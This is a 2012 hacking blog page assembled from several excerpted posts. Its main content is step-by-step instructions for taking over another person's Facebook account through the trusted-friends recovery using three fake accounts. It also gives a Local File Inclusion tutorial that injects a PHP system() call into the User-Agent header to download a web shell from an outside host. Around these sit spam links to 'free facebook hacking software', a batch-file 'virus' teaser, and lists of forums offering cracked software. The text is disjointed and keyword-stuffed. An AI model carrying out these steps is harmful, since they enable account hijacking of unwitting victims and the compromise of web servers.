Saturday, 8 December 2012

his is the most EASIEST and SIMPLEST way of hacking a facebook account.I don't recommend Facebook Phishing pages anymore as people are not that dumb these days to fall for this trick. Today I will tell you the latest approach of Hacking Facebook Passwords or Accounts. Learn how to hack their facebook account and get their password. Phishing, computer and phone spy software, and scams all covered here!
Hack Facebook NOW - The best FREE facebook hacking software. Click here and grab it now!
Welcome to the tutorial on how to hack any facebook accounts, in next 24 hours, without keylogging/phishing etc. I see many people asking for help on hacking facebook accounts, or beg others to do it for them. Most of them belive that they can do it instantly only with one click. Yeah, that's easy: just click here to do it.
Phishing is one of the easiest methods that you can use to hack Facebook accounts or any other email accounts. I will explain how you can Hack Facebook accounts by using a Phisher (fake login page).
Searches related to

how to hack a facebook account

how to hack a facebook account without downloading anything
how to hack a facebook password
how to hack a facebook account for free no download
how to hack someones facebook account
crack facebook account
view private facebook account
hack facebook login
how to hack a facebook account password without downloading anything

How to hack a Facebook account Free + Working 2013

Hello and welcome to Fun & Hacks! In this post i will show you how hack a facebook account via 3 trusted friends method. To do this trick, you must have 3 facebook account and those accounts must be in  your victims friend list . Follow the below steps carefully :-
1-Collect few information about the victim's facebook account i.e. email address & username
2-After collecting ,go to facebook.com and click on forgot password

3- Now you will be redirected to a new page where you will have to fill up a form with victim's email address , username & facebook name  and then click on search.


4-Now in the new page just click on no longer have access to this?


5-After that, Facebook will ask you to enter new email address. Just enter your email id or create a new one for safety purpose . After filling up, click on submit.


6-Than facebook will promote you to enter the Security question. Simply enter 3-4 wrong answers and it will take you to the 3 trusted friends recovery page. Click on continue.


7- Now select your 3 facebook accounts one by one and after selecting, facebook will send security codes to those accounts. Just enter those codes and you will get password resetting email from facebook in your email account.
Read More

How to Hack Your Friend’s Facebook Account Easily

Millions of people are talking about Facebook Account Hacking Tricks. But after a long search a few are able to do so who have much knowledge of HTML coding and professional in IT. But Hackers are trying to get the best and easy trick to Hack the Facebook Accounts. Everybody know that it’s not so much easy to hack facebook accounts. Facebook pays a lot of money to it’s security employees and experts to reduce hacking of accounts. But hackers have gained a super rage in IT market and they have unleashed a trick to hack facebook account. This trick is not funny or fake at all.
Facebook Account <strong>hack</strong> Easily
Many of you know that Facebook has integrated a new feature to recover forgotten passwords of users i.e. Three Trusted Facebook Account Friends. However, this trick is integrated for recovering the lost passwords by Facebook but Hackers reversed it and use this trick to hack the Facebook Accounts. This is a major black hole in Facebook and it’s security plannings.
Many people hacks Facebook Accounts by Keylogging, Phishing sites, DDOS attacks etc but that is neither called hacking nor the people called hackers. These are the alternate methods of hacking.
By the way the trick unleashed which we are talking about here is also not so much simple at all. But it is easy to do as about every people and children can do so. You have to make THREE FAKE FACEBOOK ACCOUNTS to do this trick. And the most important is that these all 3 FAKE ACCOUNTS were added in your friend’s list whose account you are about to Hack.
After this, you are able to hack your Friend’s Facebook Account easily by just following the steps given below.

Step To Step Guide How to hack facebook account Easily:

  • As we have already discussed  before to create THREE FAKE FACEBOOK ACCOUNTS and add them in the friend list of your friend’s Facebook account whom account you are about to hack. If you have done so, then you have finished about 90% of your work to Hack the account.
  • The, click on Forgot Facebook Password button. Facebook system will show you three solutions to recover your password as shown below
Facebook-Hack-1
  • Fill the Email address of your friend in the first section and give your Friend’s Name and your name in the Name Field
  • Then, click on Search Button.
  • If you have done above steps correctly, then you will see the profile picture of your friend whose Email address is to be filled/whose account is to be hacked
  • After that, click on No Longer Have Access to These
No longer access to facebook account
  • Then, enter a New Email Address which has not to be used with Facebook Account earlier and click on the Submit button to proceed to next step
new email address
  • You will be asked for the security question’s answer. If you know the answer then it’s perfect and if you don’t know then fill it with wrong answers 3 times
Facebook Security Answer
  • After this submission/giving wrong answers, Facebook Security will show you TRUSTED FRIENDS feature to recover the account
  • Click on the Continue button
3 Trusted Friends Feature Facebook
  • Then, it will ask you to fill/select 3 Friends ( select your 3 Fake Account’s Name) from the shown list and click the Continue button each time after the selection
  • After the above step, Facebook have sent the security codes to each of the 3 accounts selected
  • Then, Login to each of the 3 accounts and note the security codes manually and fill them in proper manner ( If they are not found in Inbox then check the Spam Folder too )
  • Now, the Password Reset Email has been sent to the new Email provided by you in the 7th step
That’s it! You are done successfully, Now, you have access to your Friend’s Facebook Account which has been HACKED.


Read More

1 – Introduction
2 – Finding LFI
3 – Checking if proc/self/environ is accessible
4 – Injecting malicious code
5 – Access our shell
6 – Shoutz

>> 1 – Introduction
In this tutorial I show you how to get a shell on websites using Local File Inclusion vulnerabilities and
injection malicious code in proc/self/environ.Is a step by step tutorial.
>> 2 – Finding LFI
- Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.
www.website.com/view.php?page=contact.php
- Now lets replace contact.php with ../ so the URL will become
www.website.com/view.php?page=../
and we got an error
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
big chances to have a Local File Inclusion vulnerability.Let’s go to next step.
- Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :
www.website.com/view.php?page=../../../etc/passwd
we got error and no etc/passwd file
Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337
so we go more directories up
www.website.com/view.php?page=../../../../../etc/passwd
we succesfully included the etc/passwd file.
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin
>> 3 – Checking if proc/self/environ is accessible
- Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ
www.website.com/view.php?page=../../../../../proc/self/environ
If you get something like
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80
proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.
>> 4 – Injecting malicious code
- Now let’s inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :
www.website.com/view.php?page=../../../../../proc/self/environ
Choose Tamper and in User-Agent filed write the following code :
<?system(‘wget http://hack-bay.com/Shells/gny.txt -O shell.php’);?>

Then submit the request.
Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt and will save it as shell.php in the
website directory) through system(), and our shell will be created.If don’t work,try exec() because system() can be disabled on the webserver from php.ini.
>> 5 – Access our shell
- Now lets check if our malicous code was successfully injected.Lets check if the shell is present.
www.website.com/shell.php
Our shell is there.Injection was succesfully.
Read More

Hey guys I am back again with something interesting today. I am going to talk about windows security architecture. You may ask why do we need to know the architecture of an operating system. The answer is if you want to break something then you must know how it works so that you can achieve your target smoothly!
Everyone knows that Windows is the most widely used operating system across the globe. So that means you are going to come across many systems running with Windows OS in your hacking career. That is, this topic which I am going to describe is the must know for you people. In this topic I will be only covering the security architecture not the breaking of it!                                                                                                                                                                                             Hello guys, in this post I will talk about backtracking. This will be just an introductory post for now. So read on…!
BackTrack is an all-in-one tool which is the heart of hackers (Both for Newbies and Professionals). If I had to talk about BackTrack and hacking then I would tell it off in just a single sentence that is ” BackTrack takes out the word impossible from a hackers dictionary!” BackTrack contains all the tools which are required for a hacker. Once you master the backtracking stuff then no one can beat you.
As this an Operating System (OS) I can’t give you a theoretical tutorial but will be giving a visual so I have embedded a video which will be helpful for you to understand how to handle and use BackTrack. This video I have found on YouTube and I am sharing with you guys!                                                                                                                                                                                    
Hey guys, hope you guys are still listening me… Well today I am here to give you a batch file virus which will display your message continuously even after you close or hit “Okay” it re-appears! Well this one is not of that much of professional use but you can use it for pranking your friends or girlfriends!
This is just a simple batch file, in future I will be talking more on this topic. I will give a complete introduction and basic command list which is useful to write a batch file virus!
Actually virus is a simple program which can cause damage to your systems. Batch file viruses are used by script kiddies to get in action… If it is used efficiently you can really cause a huge damage to the system
Read More

trick to boost torrent speeds

Trick To Boost Torrent Speeds Using UTorrent Turbo Booster Plugin

uTorrent Turbo Booster is a recent plug-in designed to improve the functionality of probably the most popular P2P file sharing application around – uTorrent.
This tool comes equipped with modern technology that aims at getting your download speed way up so you can grab the files you want so badly much quicker than you’ve been used to. Movies, music, games, applications, you name it - uTorrent Turbo Booster will deliver at a fast pace. It will be there doing its job in the background without upsetting any other activity you might perform on your computer.
Read More

hacking web site to learn

While many of us write applications using all of the standard techniques that you learn in programming classes in college, these folks take programming into a realm where there are no rules. They can test all aspects of an application until they find a chink in the armor, and then exploit those vulnerabilities.
As we explore the world of hacking, it should be noted that there are two major forms of hacking – we’ll call it “white hat” and “black hat.” The “white hat” hackers call themselves “ethical hackers,” in that they find vulnerabilities and exploits only to make the programming and application communities more secure for everyone. However, there’s a whole other community of hackers who find vulnerabilities to do nothing more than exploit them as much as humanly possible. Now that you know what sort of community you may be entering, let’s get on with the list of top sites where you can learn how to hack.

#1 – CyberXtreme: Hacking and Warez

CyberXtreme is an impressive forum with a significant hacking section, but also entire sections on technology, graphics and even a tech support area. Here you’ll find cracks, secret codes, free download packages (some containing cracked software which may be illegal to download in your area, so be careful). The forum is very protective of its content, so you’ll have to register with a valid email address before you can even get a glimpse of the content that’s on the forums.
learn how to hack
The hacking section is very detailed and, as shown above, includes not only free tools and software exploits, but if you want to learn some coding tricks from the resident hacking gurus, just enter the “Coding & Programming” forum and you’ll get your fill. Before long you’ll be writing up your own customized hacking tools!

#2 – EvilZone Hacking Forums

While the name, EvilZone, isn’t exactly the most inviting – it is easily one of the largest forum communities that you’ll find on the subject of hacking. With over 6,500 members and over 100,000 posts (and counting), this community likely has the skills and knowledge to answer any programming question you could possibly have. Just be careful about coming across as a “noob” – these guys don’t handle newcomers with kid gloves, so be careful.
learn how to hack
You’d definitely be best off working through the programming and encyclopedia sections first, where you’ll find projects, tutorials and a lot more that will help you become educated and well-versed in hacking techniques and terminology.

#3 – Hack a Day

While I certainly don’t want to offer a nod to any blogs that may be considered competition, you really have to give credit where credit is due when it comes to a particular niche like hacking – and Hack a Day definitely offers an amazing library of information for anyone looking for specific categories like cellphones, GPS or digital cameras. You’ll find all hacks organized by category in the right column.
learning hacks
More than any other site, this particular “hacking” site is very much hardware based, and they redefine the meaning of the word hacking by literally hacking up electronic devices like a Gameboy or a digital camera and completely modifying it. Of course you’ll still find the occasional software hack, such as how to remove the Blackberry download limit.
learn how to hack free
While I personally don’t find the articles themselves very detailed (as an EE, I like schematics and elaborate descriptions) – but the site makes up for it with video demonstrations throughout.

#4 – Hack In The Box

If any site could be classified as the most comprehensive site to learn how to hack, this would be it. Hack In The Box is more about security and ethical hacking than anything else – and that’s more than obvious reviewing the classes and conferences listed on the main page.
learn how to hack free
The manage page is an informational portal that includes information from all other areas, including recent forum posts, conference updates, E-zine and news articles and a lot more. To be honest, there’s so much information stuffed on the main page that it’s almost overwhelming.
download free hack software
There’s a lot of material available, but if you’ve so interested in learning how to hack that you wouldn’t mind paying to attend a class or a conference – then this is the place to do it.

#5 – Hack This Site!

As always, saving the best for last – I’d like to introduce Hack This Site! This website is one of the coolest, free programmer training sites where you can learn how to hack accepting one of the challenges.
download free hack software
The site designers offer various “missions,” where you need to figure out the vulnerability of a site and then attempt to use your new-found hacking skills (you’ve carefully studied all of the articles on the site, right?) to hack the web page. Missions include Basic, Realistic, Application, Programming and many others.
download free hack software
If you’re able to figure out how to properly hack any of the most difficult missions on this site, then you’ve definitely earned the title of professional hacker.
Have you ever tried any of the tips offered at any of these websites and do they work? Do you have any good resources of your own for readers to learn how to hack like the pros? Share your insight in the comments section below.
Read More

how to learn hacking

Whether you’re a college student, a middle-aged networking guru or a wife and mother fascinated by the world of online games – everyone occasionally comes across a situation where some form of hacking would make life a whole lot easier.
Maybe you’ve lost the license that came with your legitimate software package that you paid for. Maybe you want to make a backup copy of your favorite DVD movie, but there’s copy-protection encoded onto the disk. Or maybe you’re just stuck on a popular online game and you want to know if there are any hacks available to level up in the game without the required effort.
Whatever your specific needs or situation – I’m not here to judge. In the field of computers and Internet technologies, just about everything is written in one programming language or another. No programmer is perfect – they all make mistakes. There are back doors, secret codes and vulnerabilities in just about any application you come across. Because of that, if you learn how to hack on your own, or just following the efforts of active hacking communities can provide you with tremendous eye-opening insight into the inner-workings of even your most “trusted” software applications.

Where You Can Go To Learn How To Hack Like a Pro

One thing that’s obvious when you visit the websites where professional hackers hang out – there’s so much about programming that even the most seasoned professional programmers don’t know. Professional hackers are an exceptional, amazing and terrible breed of individuals all packaged into one. While I write this, I realize that I am also describing over half of our readership – you know who you are! These folks take programming to an extreme that’s simply astounding when you see it in action.
Read More